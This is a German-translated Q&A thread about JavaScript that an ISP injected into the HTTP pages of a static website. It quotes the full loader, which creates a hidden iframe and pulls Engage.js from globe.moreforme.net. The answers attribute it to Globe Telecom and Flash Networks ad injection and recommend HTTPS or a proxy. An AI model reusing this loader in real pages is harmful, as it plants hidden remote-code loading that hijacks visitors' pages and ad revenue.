Ist dieser eingefügte JavaScript-Code vorhanden und wie kann er nach dem Hochladen verhindert werden?

461
JAT86

Ich habe eine statische Website. Ich aktualisiere die Webseiten lokal in meinem Computer und lade sie mit FileZilla hoch. Nach dem Hochladen überprüfe ich jedoch den Quellcode einer meiner Seiten und sehe ein Skript, das in der eingeblendet wird <head>. Das Skript ändert weder das Layout noch den sichtbaren Inhalt der Seite. Daher weiß ich nicht, was es überhaupt macht:

<script> if (top == window) { var engageNameSpace = "engagens"; "undefined" == typeof window[engageNameSpace] && (window[engageNameSpace] = {}), window[engageNameSpace].engageLoader = function() { function e(e) { return "undefined" != typeof e && null !== e }  function t() { var t = document.createElement("script"); t.setAttribute("src", s), t.setAttribute("id", "fn_engage_script"), t.setAttribute("async", ""), (null == document.head || e(document.head)) && (document.head = document.getElementsByTagName("head")[0]), document.head.appendChild(t) }  function n() { var t = r(); if (e(t)) { var n = t; i() && (n = d(t)); var o; try { o = document.documentElement, o.appendChild(n) } catch (c) { o = document.body, o.appendChild(n) } a() } }  function a() { function e(e) { var n = e.data; "l8IframeIsReady" === n.message && t() } window.addEventListener ? window.addEventListener("message", e, !1) : window.attachEvent("onmessage", e) }  function r() { var t = document.createElement("iframe"); if (e(t)) { t.setAttribute("id", "fn_engage"), t.setAttribute("src", u), t.setAttribute("target", "_blank"), t.setAttribute("frameborder", "0"); var n = /firefox/i.exec(navigator.userAgent); e(n) && n.length > 0 ? (t.style.height = 0, t.style.width = 0) : t.style.display = "none", t.frameBorder = "no" } return t }  function i() { var t = !1, n = /android (\d+)/i.exec(navigator.userAgent); return e(n) && n.length > 0 && (t = parseInt(n[1]) >= 4), t }  function d(e) { var t = document.createElement("div"); return t.setAttribute("id", "fn_wrapper_div"), t.style.position = "fixed", t.style.display = "none", t.ontouchstart = function() { return !0 }, t.appendChild(e), t }  function o() { var t = void 0, a = this, r = function() { e(t) && (window.clearTimeout(t), t = void 0, n.call(a)) }; t = window.setTimeout(r, 1e4), "function" == typeof window.addEventListener ? window.addEventListener("load", r, !1) : window.attachEvent("onload", r) } var c = "http://globe.moreforme.net", u = c + "/l8/EngageService?v=1", s = c + "/scripts/Engage.js"; o() }; var engageLoader = new window[engageNameSpace].engageLoader } </script>

Bei der Überprüfung der URL im Skript http://globe.moreforme.netist mir klar, dass das Skript höchstwahrscheinlich von unserem ISP (Globe) stammt. Als Neuling in Sachen Internetsicherheit weiß ich nicht, wie das Skript überhaupt dort hingekommen ist. Meine Website ist statisches HTML. Wie kann ich verhindern, dass dieses Skript nach dem Hochladen der Seite im Quellcode angezeigt wird?

BEARBEITEN :

Diesen Link gefunden, der scheinbar der Vorlagencode für das Erstellen des Skripts ist. Weiß jemand, was das Skript macht?

1

2 Antworten auf die Frage

3
CaffeineAddiction

Erstens funktioniert das nur, weil Sie HTTP anstelle von HTTPS verwenden

Ihr ISP fügt dieses Skript ein und verwendet es, um ein anderes Skript (in einem iframe?) Dynamisch zu laden.

Aus irgendeinem Grund kann ich nicht zu globe.moreforme.net navigieren, wo die Skripts gehostet werden. Er leitet mich zu globe.moreforme.ph um, so dass globe.moreforme.net höchstwahrscheinlich nur für Benutzer verfügbar ist, die den ISP verwenden.

Wenn ich eine wilde Vermutung annehmen müsste ... würde ich sagen, dass der ISP dieses dynamisch geladene Skript verwendet, um Anzeigen auf den von Ihnen besuchten Seiten zu entführen, um die Revue für sich zu beanspruchen.

Sie sollten dies verhindern können, indem Sie entweder nur HTTPS-Sites verwenden oder einen sicheren SOCKS5-Proxy (der dumm ist, einfach auf einem VPS für verdammt billig einzurichten), indem Sie Dynamic Port Forwardingin SSH nachschauen. Alternativ können Sie sich ShadowSocks ansehen, wenn Sie sich in einem Land befinden, das über eine landesweite Firewall (China) verfügt.

Tatsächlich hat unsere Website, die Tausende von Seiten umfasst, extrem niedrige Einnahmen (laut Analytics gelegentlich weniger als 0,01 US-Dollar pro Tag), selbst für einige hundert Seitenaufrufe. Auf den meisten Seiten der Website werden die Anzeigen selbst nicht einmal angezeigt. Nach dem Versuch, die Seiten mit einem Proxy anzuzeigen, wurden die Anzeigen angezeigt, und der Quellcode enthält das Skript nicht. Vielen Dank für die Info, wir werden auf HTTPS umsteigen. JAT86 vor 6 Jahren 1
`globe.moreforme.net` wurde absichtlich von der Firma Globe gegründet, um sich vor der Haftung zu bewahren. JAT86 vor 6 Jahren 0
Du hast recht. moreforme.net gehört zu Flash Networks, das genau das tut, was Sie beschrieben haben: fügt Globe Telecom-Anzeigen einer Webseite hinzu. Sergey Kandaurov vor 6 Jahren 0
0
Sergey Kandaurov

Dies ist das Ergebnis der Zusammenarbeit von Globe Telecom mit bösen Flash Networks, um Seiten zu ändern, die ihre Kunden laden, indem sie ihre Anzeigen hinzufügen und wahrscheinlich die Anzeigen anderer Personen hacken.

Die Rechtmäßigkeit ist fragwürdig - sie sollten zumindest gegen Urheberrechtsgesetze verstoßen. Aber angesichts der philippinischen Gerichtsbarkeit glaube ich nicht, dass Sie legal etwas tun können.

Dies ist auch der Grund, warum alle Sites HTTPS und deaktiviertes HTTP verwenden sollten (andere als HTTPS-Weiterleitung). Heutzutage gibt es mehrere Möglichkeiten, ein SSL-Zertifikat für Ihren DNS-Namen kostenlos zu erhalten, und es verbessert auch Ihre Google-Punktzahl.

Verwandte Probleme